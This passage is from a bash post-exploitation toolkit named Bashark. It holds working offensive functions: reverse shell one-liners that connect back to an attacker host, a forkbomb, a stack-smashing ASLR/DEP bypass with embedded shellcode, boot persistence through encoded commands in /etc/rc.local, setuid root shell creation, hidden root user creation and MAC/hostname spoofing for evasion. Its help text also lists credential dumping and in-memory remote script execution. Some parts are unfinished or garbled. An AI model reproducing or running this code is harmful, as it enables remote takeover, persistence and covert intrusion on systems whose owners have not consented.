/usr/bin/nc -l -p 4444 -e /bin/sh\\r\\nHost: \\r\\nConnection: close\\r\\n\\r\\n\" | nc 80" } function lua_shell(){ echo -e "lua5.1 -e 'local host,port = \" $ipaddr \", $port local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host,port); while true do local cmd,status,partial = tcp:receive() local f = io.popen(cmd,'r') local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'" } function powershell_shell(){ echo -e "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\" $ipaddr \", $port );\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + \"PS \" + (pwd).Path + \"> \";\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" } function telnet_shell(){ echo -e "telnet $ipaddr $port | /bin/bash | telnet $ipaddr 9999 " } if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} revshellgen [-h] [-l] TYPE LHOST LPORT ${underline}POSITIONAL ARGUMENTS:${reset} -l Show available reverse shells ${underline}POSITIONAL ARGUMENTS:${reset} TYPE Type of the shell to use LHOST Listening host LPORT Listening port ${underline}DESCRIPTION:${reset} Output a reverse shell of chosen type" elif [[ "$@" =~ .*-l.* ]]; then print_good "Available reverse shells:" echo " 1) bash_shell 2) ruby_shell 3) perl_shell 4) netcat1_shell 5) netcat2_shell 6) netcat3_shell 7) python_shell 8) java_shell 9) php_shell 10) shellshock_shell 11) lua_shell 12) powershell_shell 13) telnet_shell" else type=$1 ipaddr=$2 port=$3 $type fi } ldexec(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} ldexec [-h] FILE ${underline}POSITIONAL ARGUMENTS:${reset} FILE File to execute ${underline}DESCRIPTION:${reset} Execute file without execution permission bit set" else if [ $# -eq 0 ]; then print_error "Specify the FILE" else file=$1 cp $file /tmp/abcde chmod a-x /tmp/abcde linker=`ls /lib|grep -oE "ld-linux.*.so.2"` /lib/$linker /tmp/abcde fi fi } forkbomb(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} forkbomb [-h] [INTERVAL] ${underline}POSITIONAL ARGUMENTS:${reset} INTERVAL Number of seconds of optional delay ${underline}DESCRIPTION:${reset} Run a forkbomb" else if [ $# -eq 1 ]; then delay=$1 sleep $delay else :(){ :|:& };: fi fi } machange(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} machange [-h] [IFACE] [MAC] ${underline}POSITIONAL ARGUMENTS:${reset} IFACE Interface to change address on MAC New MAC adderss ${underline}DESCRIPTION:${reset} Change MAC address" else if [ $# -eq 0 ]; then print_error "Not enough arguments" elif [ $# -eq 1 ]; then iface=$1 elif [ $# -eq 2 ]; then mac=$2 else iface="eth0" fi /etc/init.d/networking stop ifconfig $iface hw ether $mac /etc/init.d/networking start if [ $# -eq 0 ]; then print_good "Changed mac address to $mac" fi fi } aslray(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} aslray BINARY BUFSIZE [SHELLCODE] ${underline}POSITIONAL ARGUMENTS:${reset} INTERFACE Interface to perform stealthing on BUFSIZE Buffer to pass as an argument SHELLCODE Shellcode to execute (default: spawn shell) ${underline}DESCRIPTION:${reset} ALSR and DEP/NX bypass for x86/x86_64 (stack smashing) " else if [ $# -eq 0 ]; then print_error "Specify BINARY" elif [ $# -eq 1 ]; then print_error "Specify BUFSIZE" else FILE=$1 BUFFER=$2 SC=$3 x86=$(file $FILE | grep '32-bit') if [[ "$x86" ]]; then print_info 'ELF IS 32-BIT' if [[ `readelf -l $FILE | grep RWE` ]]; then print_info 'STACK IS EXECUTABLE' print_info 'SPRAYING NOPSLED AND SHELLCODE...' if [[ "$SC" != "" ]] then SC=$(echo $SC | sed s/x/\\\\x/g) export SHELLCODE=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne $SC) else export SHELLCODE=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80') fi print_info 'EXPLOITING...' $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz') while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x80\x80\xfc\xff') ; done else print_good 'DEP/NX DETECTED' pprint_info 'SPRAYING SHELL...' export shell0=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell1=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell2=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell3=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell4=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell5=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell6=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell7=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell8=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) export shell9=$(for i in {1..9999}; do echo -ne '/bin/sh\n';done) print_info 'EXPLOITING... may take a while, if stuck then retry' sleep 2 TYPE=/etc/os-release if [[ `grep jessie $TYPE` ]] then while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\xe0\x83\x58\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done # TODO use 'timeout 1 $FILE' in order not to stuck, but how to spawn a shell? elif [[ `grep stretch $TYPE` ]] then while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x40\xe8\x62\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done elif [[ `grep Xenial $TYPE` ]] then while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x40\xe9\x63\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done elif [[ `grep Trusty $TYPE` ]] then while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -n 'zzzz')$(echo -ne '\x70\xce\x56\xf7')$(echo -n 'XXXX')$(echo -ne '\x80\x80\x80\xff') ; done else 'NOT DEBIAN OR UBUNTU!!!' exit 2 fi fi print_info "Retry if the shellcode wasn't executed until now" else print_info 'ELF IS 64-BIT' print_info 'SPRAYING NOPSLED AND SHELLCODE...' if [[ "$SC" != "" ]] then SC=$(echo $SC | sed s/x/\\\\x/g) for n in {1..10} ; do export SHELLCODE$n=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne $SC); done else for n in {1..10} ; do export SHELLCODE$n=$(for i in {1..99999}; do echo -ne '\x90';done)$(echo -ne '\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'); done fi print_good 'EXPLOITING... may take a while' while true ; do $FILE $(for i in `seq 1 $BUFFER`;do echo -n 'x';done)$(echo -n 'yyyyyyyy')$(echo -ne '\x80\x80\x80\x80\xfc\x7f') ; done fi fi fi } uperm(){ #FINISH THIS if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} uperm [-h] ${underline}DESCRIPTION:${reset} Show files permissions for current user" else : fi } watch(){ : } shellshock(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} shellshock [-h] ${underline}DESCRIPTION:${reset} Check for shellshock vulnerabilities" else hits=0 env X='() { :; }; echo "${green}${bold}}CVE-2014-6271${reset}"' bash -c id if [ $# -eq 0 ]; then print_error "Check #1 - not vulnerable" fi env X='() { (a)=>\' bash -c "${green}${bold}CVE-2014-7169${reset}"; cat echo if [ $# -eq 0 ]; then print_error "Check #2 - not vulnerable" fi bash -c 'true </dev/null; then if [ $# -eq 0 ]; then print_error "Specify IFACE and PORTS" elif [ $# -eq 1 ]; then print_error "Specify PORTS" else iface="eth0" sudo iptables -P INPUT DROP IFS=',' read -ra PORTS <<< "$ports" for port in ${PORTS[*]}; do iptables -A INPUT -i $iface -p tcp --dport $port -j ACCEPT #Check this shit done print_good "Blocked all ports except whitelisted" fi else print_error "Unable to perform port blocking: iptables is not installed" fi fi } persist(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} persist [-h] COMMAND ${underline}POSITIONAL ARGUMENTS:${reset} COMMAND Command to be launched on every startup ${underline}DESCRIPTION:${reset} Specify command that will be launched on every boot. It will be encoded and written to /etc/rc.local." else if [ $# -eq 0 ]; then print_error "Specify the command" else root_check command=$1 encode_cmd="echo -n '$command' | base64" encoded=$(eval "$encode_cmd") decode_cmd="echo -n '$encoded' | base64 -d" decoder="$""(eval ""$decode_cmd)" sudo echo $decoder >> /etc/rc.local print_good "Appended encoded command to /etc/rc.local" fi fi } rootshell(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} rootshell [-h] ${underline}DESCRIPTION:${reset} Create a rootshell binary under /tmp directory" else root_check local shellfile=${1-$SHELL} local rootshell=${2-$(mktemp -u)} cp "$shellfile" "$rootshell" chmod u+s "$rootshell" print_good "Created a rootshell" ls -la "$rootshell" fi } usradd(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} useradd [-h] USERNAME ${underline}POSITIONAL ARGUMENTS:${reset} USERNAME Name of the new user ${underline}DESCRIPTION:${reset} Create a new hidden root user on host (currently OSX only)" else root_check() if [ $# -eq 0 ]; then print_error "Specify the username" else user=$1 if [ $platform == "osx" ]; then dscl . -create /Users/$user PrimaryGroupID 80 || print_good "Created root user" sudo dscl . create /Users/$user IsHidden 1 || print_good "Succesfully hid user" sudo mv /Users/$user /var/$user || print_good "Moved $user home directory under /var" sudo dscl . -create /Users/$user NFSHomeDirectory /var/$user || print_good "Succesfully updated new home directory" sudo dscl . -delete "/SharePoints/$user's Public Folder" || print_good "Deleted $user original home directory" else print_error "Platform is not supported" fi fi fi } swapdump(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} swapdump [-h] ${underline}DESCRIPTION:${reset} Search for in-memory credentials" else root_check fi } forward(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} forward [ssh|ssh_vpn] USERNAME HOST PORT ${underline}DESCRIPTION:${reset} Perform ssh port forwarding ${underline}POSITIONAL ARGUMENTS:${reset} USERNAME Name of the ssh user HOST Target ip PORT Port to forward " else root_check() if [ $# -eq 0 ]; then print_error "Specify mode" elif [ $# -eq 1 ]; then print_error "Specify USERNAME" elif [ $# -eq 2 ]; then print_error "Specify HOST" elif [ $# -eq 3 ]; then print_error "Specify PORT" else mode=$1 username=$2 host=$3 port=$4 if [ $1 == "ssh" ]; then ssh $username@$host -L $port:$host:$port if [ $# -eq 0 ]; then print_good "Port forward performed succesfully" else command_error_exit fi elif [ $1 == "ssh_vpn" ]; then : else print_error "No such option" fi fi fi } ghost(){ if [[ "$@" =~ .*-h.* ]]; then echo " ${underline}USAGE:${reset} ghost on|off [INTERFACE] ${underline}POSITIONAL ARGUMENTS:${reset} INTERFACE Interface to perform stealthing on ${underline}DESCRIPTION:${reset} Disappear from the net" else root_check() if [ $# -eq 1 ]; then iface="eth0" elif [ $# -eq 2 ]; then iface=$2 fi if [ $# -eq 0 ]; then print_error "Specify the switch [on|off]" else SWITCH=$1 INTERFACE=$2 TMPMAC=/tmp/mac.ghost ORGHOST=/tmp/host.ghost ORGMAC="" CMD=$( which ifconfig 2>/dev/null) if [[ $? -gt 0 ]]; then CMD=$( which ip ) fi if [[ "$SWITCH" = "on" ]] then if [ ! $(which ethtool) ] && [ ! -f /etc/udev/rules.d/70-persistent-net.rules ] then if [[ $CMD =~ .*ifconfig ]]; then ORGMAC=$( $CMD $INTERFACE | grep ether | awk '{print $2}' ) else ORGMAC=$( $CMD link show $INTERFACE | awk '$1~/^link/{print $2}' ) fi else if [[ $(which ethtool) ]] then ORGMAC=$(ethtool -P $INTERFACE) ORGMAC=${ORGMAC#*:} else ORGMAC=$(cat /etc/udev/rules.d/70-persistent-net.rules | grep $INTERFACE | cut -d '"' -f 8) fi fi echo -n $ORGMAC > $TMPMAC print_info 'Spoofing MAC address ...' /etc/init.d/network-manager stop &>/dev/null if [[ $CMD =~ .*ifconfig ]]; then $CMD $INTERFACE down else $CMD link set $INTERFACE down fi if [[ $? -ne 0 ]] then print_error "Wrong interface" exit 3 fi MAC=$(head -c 6 /proc/sys/kernel/random/uuid | sed 's/^\(..\)\(..\)\(..\).*$/48:0f:cf:\1:\2:\3/') if [[ $CMD =~ .*ifconfig ]]; then $CMD $INTERFACE hw ether $MAC else $CMD link set dev $INTERFACE address $MAC fi print_good "New MAC address: $MAC" print_info 'Configuring kernel to restrict ARP/NDP requests in linking network mode ...' sysctl net.ipv4.conf.$INTERFACE.arp_ignore=8 > /dev/null sysctl net.ipv4.conf.$INTERFACE.arp_announce=2 > /dev/null ip6tables -I INPUT 1 -i $INTERFACE --protocol icmpv6 --icmpv6-type echo-request -j DROP ip6tables -I INPUT 2 -i $INTERFACE --protocol icmpv6 --icmpv6-type neighbor-solicit -j DROP print_info 'Reinitializing network interface ...' print_info 'If not connected or taking too long - reconnect manually' if [[ $CMD =~ .*ifconfig ]]; then $CMD $INTERFACE up else $CMD link set $INTERFACE up fi /etc/init.d/network-manager start &>/dev/null hostname > $ORGHOST hostnamectl set-hostname $RANDOM print_good 'New hostname : '$(hostname) xauth add $(hostname)/$(xauth list | cut -d '/' -f 2 | tail -n 1) chown $(echo $XAUTHORITY | cut -d '/' -f 3): $XAUTHORITY 2>/dev/null print_question 'Perform DHCP (unless you want to specify your own IP)? (y/n)' read dhcp dhcp=${dhcp,,*} dhcp=${dhcp::1} if [[ "$dhcp" = "y" ]] then dhclient $INTERFACE &> /dev/null fi if [[ $CMD =~ .*ip ]] then print_info 'Erasing previous IP...' sleep 4 $CMD addr del $(ip addr show dev $INTERFACE | grep second | cut -d ' ' -f 6 | cut -d '/' -f 1) dev $INTERFACE fi print_good "{magenta}Ghost mode enabled{reset}" elif [[ "$SWITCH" = "off" ]] then if [ ! $(which ethtool) ] && [ ! -f /etc/udev/rules.d/70-persistent-net.rules ] then ORGMAC=$( cat $TMPMAC ) else if [[ $(which ethtool) ]] then ORGMAC=$(ethtool -P $INTERFACE) ORGMAC=${ORGMAC#*:} else ORGMAC=$(cat /etc/udev/rules.d/70-persistent-net.rules | grep $INTERFACE | cut -d '"' -f 8) fi fi print_info 'Reinitializing MAC address ...' echo /etc/init.d/network-manager stop &>/dev/null if [[ $CMD =~ .*ifconfig ]]; then $CMD $INTERFACE down $CMD $INTERFACE hw ether $ORGMAC else $CMD link set $INTERFACE down $CMD link set dev $INTERFACE address $ORGMAC fi if [[ $? -ne 0 ]] then print_error "Wrong interface" exit 3 fi print_info 'Reconfiguring kernel to normal ARP/NDP linking network mode ...' sysctl net.ipv4.conf.$INTERFACE.arp_ignore=0 > /dev/null sysctl net.ipv4.conf.$INTERFACE.arp_announce=0 > /dev/null ip6tables -D INPUT -i $INTERFACE --protocol icmpv6 --icmpv6-type echo-request -j DROP ip6tables -D INPUT -i $INTERFACE --protocol icmpv6 --icmpv6-type neighbor-solicit -j DROP print_info 'Restoring hostname ...' xauth remove $(hostname)/$(xauth list | cut -d '/' -f 2 | tail -n 1) 2>/dev/null chown $(echo $XAUTHORITY | cut -d '/' -f 3): $XAUTHORITY 2>/dev/null hostnamectl set-hostname $(cat $ORGHOST) print_info 'Reinitializing network interface ...' print_info 'If not connected or taking too long - reconnect manually' if [[ $CMD =~ .*ifconfig ]]; then $CMD $INTERFACE up else $CMD link set $INTERFACE up fi /etc/init.d/network-manager start &>/dev/null print_question 'Perform DHCP (unless you want to specify your own IP)? (y/n)' read dhcp dhcp=${dhcp,,*} dhcp=${dhcp::1} if [[ "$dhcp" = "y" ]] then dhclient $INTERFACE &> /dev/null fi sleep 2 /etc/init.d/network-manager restart &>/dev/null rm -f $TMPMAC print_good "{magenta}Ghost mode disabled{reset}" fi fi fi } ##Help command #Finish and add mod command help(){ echo " Bashark ver. 2.0 Commands: (${green}no root required${reset}): ${bold}_${reset}${green} -> ${reset}Go back to previous directory ${bold}bruteforce${reset}${green} -> ${reset}Perform a dictionary attack against a protected file ${bold}c${reset}${green} -> ${reset}Clear screen ${bold}cleanup${reset}${green} -> ${reset}Modify Bashark cleanup routine settings ${bold}cve${reset}${green} -> ${reset}Search for a kernel exploit ${bold}esc${reset}${green} -> ${reset}Escape to a non-restricted shell ${bold}fnd${reset}${green} -> ${reset}Recursively search for string occurrence in current directory ${bold}fndre${reset}${green} -> ${reset}Search for most popular regullar expressions in a file ${bold}fileinfo${reset}${green} -> ${reset}Inspect a file ${bold}getapp${reset}${green} -> ${reset}Enumerate installed applications ${bold}getconf${reset}${green} -> ${reset}Enumerate configuration files ${bold}getdbus${reset}${green} -> ${reset}List all available Dbus services ${bold}getidle${reset}${green} -> ${reset}List active PTYs and their idle time ${bold}getperm${reset}${green} -> ${reset}Show files and folders with special permissions ${bold}getsec${reset}${green} -> ${reset}Search for dereferences and presence of three most popular mac programs ${bold}help${reset}${green} -> ${reset}Show this help message ${bold}hosts${reset}${green} -> ${reset}Enumerate active hosts in background ${bold}keyinstall${reset}${green} -> ${reset}Add a RSA key to list of authorized SSH keys ${bold}isvm${reset}${green} -> ${reset}Check if os is running on virtual machine ${bold}jshell${reset}${green} -> ${reset}Establish a reverse interactive javascript shell ${bold}ldexec${reset}${green} -> ${reset}Execute a file without permission bit set ${bold}lg${reset}${green} -> ${reset}Search for regular expression in filenames of current directory ${bold}mex${reset}${green} -> ${reset}Make file executable ${bold}memexec${reset}${green} -> ${reset}Download and execute remote bash script in memory ${bold}mkd${reset}${green} -> ${reset}Create a directory ${bold}mod${reset}${green} -> ${reset}Modify every file in current directory with given extension ${bold}portscan${reset}${green} -> ${reset}Perform a portscan ${bold}quit${reset}${green} -> ${reset}Exit bashark ${bold}revshell${reset}${green} -> ${reset}Spawn a reverse shell ${bold}revshellgen${reset}${green} -> ${reset}Generate a reverse shell in different formats ${bold}shellcode${reset}${green} -> ${reset}Execute shellcode provided in "\x" escaped form ${bold}t${reset}${green} -> ${reset}Create a file ${bold}timestomp${reset}${green} -> ${reset}Change attributes of a file ${bold}usrs${reset}${green} -> ${reset}Show all users on the host ${bold}xml_dos${reset}${green} -> ${reset}Create a xml or yaml dos file ${bold}xxe${reset}${green} -> ${reset}Generate a xml external entity injection file (${red}root required${reset}): ${bold}linikatz${reset}${red} -> ${reset}Enumerate plaintext and in-memory credentials ${bold}portblock${reset}${red} -> ${reset}Block all opened ports except whitelisted ${bold}persist${reset}${red} -> ${reset}Set a command to be executed after every boot ${bold}rootshell${reset}${red} -> ${reset}Create a rootshell ${bold}usradd${reset}${red} -> ${reset}Create a new hidden user (osx only) ${bold}forward${reset}${red} -> ${reset}Perform ssh port forwarding To show additional information about specific command, type ' -h' " }